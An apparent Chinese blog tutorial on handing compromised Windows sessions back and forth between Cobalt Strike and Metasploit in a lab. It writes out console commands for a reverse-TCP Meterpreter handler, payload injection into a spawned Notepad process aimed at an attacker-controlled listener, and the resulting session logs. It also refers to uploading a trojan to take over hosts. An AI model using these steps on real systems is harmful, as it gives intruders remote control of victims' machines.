当前位置: 首页 > news >正文

cs与msf权限传递

cs传递到msf

1,先启动cs

┌──(root㉿ring04h)-[~/cobalt_strike_4.7]
└─# ./teamserver 192.168.196.144 123456
​
┌──(root㉿ring04h)-[~/cobalt_strike_4.7]
└─# ./start.sh
​

2,上传木马,上线主机

3,msf配置一个反向连接的tcp监听

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.196.144
lhost => 192.168.196.144
msf6 exploit(multi/handler) > set lport 12345
lport => 12345
msf6 exploit(multi/handler) > exploit 

4,cs配置一个Foreign HTTP监听器

host,port就配置msf所在主机ip,端口就行

5,选择spawn(权力委派的意思)进行转移,然后选中Foreign HTTP监听器就行了

6,msf结果

msf6 exploit(multi/handler) > exploit 
​
[*] Started reverse TCP handler on 192.168.196.144:12345 
[*] Sending stage (176198 bytes) to 192.168.196.10
[-] Meterpreter session 3 is not valid and will be closed
[*] 192.168.196.10 - Meterpreter session 3 closed.
[*] Sending stage (176198 bytes) to 192.168.196.10
[*] Meterpreter session 4 opened (192.168.196.144:12345 -> 192.168.196.10:60922) at 2024-05-28 23:31:51 -0400
​
meterpreter > ipconfig

msf传递到cs

1,上传木马,上线主机

2,在cs中添加一个监听器

3,在msf中配置

msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.196.144 //cs的ip
lhost => 192.168.196.144
msf6 exploit(windows/local/payload_inject) > set lport 3333  //cs的端口
lport => 3333
msf6 exploit(windows/local/payload_inject) > set DisablePayloadHandler true 
DisablePayloadHandler => true
msf6 exploit(windows/local/payload_inject) > set prependmigrate true 
prependmigrate => true
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1
msf6 exploit(windows/local/payload_inject) > exploit 
​
[*] Running module against DCTEST
[*] Spawned Notepad process 1352
[*] Injecting payload into 1352
[*] Preparing 'windows/meterpreter/reverse_tcp' for PID 1352

4,成功

相关文章:

  • 最大矩形问题
  • 如何给 MySQL 表和列授予权限?(官方版)
  • HBuilderX编写APP一、获取token
  • Polar Web【简单】upload1
  • 【Meetup】探索Apache SeaTunnel的二次开发与实战案例
  • 数据结构初阶 堆(一)
  • PostgreSQL的视图pg_class
  • 【STM32】STM32F103C6T6标准外设库
  • 【傅里叶变换】 关于 Matlab ifft(Y,n) 在C#中实现遇到的问题
  • YOLOv8---seg实例分割(制作数据集,训练模型,预测结果)
  • C++中的lambda表达式详解
  • 前端 JS 经典:下载的流式传输
  • 具有 MOSFET 的电压到电流 (V-I) 转换器电路
  • 企业费用标准如何制定?
  • Python文本处理利器:jieba库全解析
  • 【译】React性能工程(下) -- 深入研究React性能调试
  • axios请求、和返回数据拦截,统一请求报错提示_012
  • Babel配置的不完全指南
  • docker容器内的网络抓包
  • java架构面试锦集:开源框架+并发+数据结构+大企必备面试题
  • KMP算法及优化
  • leetcode386. Lexicographical Numbers
  • Node + FFmpeg 实现Canvas动画导出视频
  • vue-loader 源码解析系列之 selector
  • 从零开始学习部署
  • 从零开始在ubuntu上搭建node开发环境
  • 读懂package.json -- 依赖管理
  • 解析带emoji和链接的聊天系统消息
  • 精彩代码 vue.js
  • 3月7日云栖精选夜读 | RSA 2019安全大会:企业资产管理成行业新风向标,云上安全占绝对优势 ...
  • #QT(一种朴素的计算器实现方法)
  • #stm32驱动外设模块总结w5500模块
  • (bean配置类的注解开发)学习Spring的第十三天
  • (DFS + 剪枝)【洛谷P1731】 [NOI1999] 生日蛋糕
  • (每日持续更新)信息系统项目管理(第四版)(高级项目管理)考试重点整理第3章 信息系统治理(一)
  • (转)winform之ListView
  • .NET CORE 第一节 创建基本的 asp.net core
  • .NET DevOps 接入指南 | 1. GitLab 安装
  • .NET 使用 ILMerge 合并多个程序集,避免引入额外的依赖
  • .NET/C# 如何获取当前进程的 CPU 和内存占用?如何获取全局 CPU 和内存占用?
  • .net快速开发框架源码分享
  • .NET学习全景图
  • [Android 数据通信] android cmwap接入点
  • [BeginCTF]真龙之力
  • [C++][基础]1_变量、常量和基本类型
  • [C++]命名空间等——喵喵要吃C嘎嘎
  • [C++进阶篇]STL中vector的使用
  • [CQOI 2011]动态逆序对
  • [English]英语积累本
  • [iOS]iOS获取设备信息经常用法
  • [leetcode] Multiply Strings
  • [Linux] 常用命令--版本信息/关机重启/目录/文件操作
  • [OS-Linux] CentOS 7.x 使用密钥登录安全设置
  • [Python] 字典操作及方法总结
  • [RK-Linux] RK3399支持M.2 NVMe SSD启动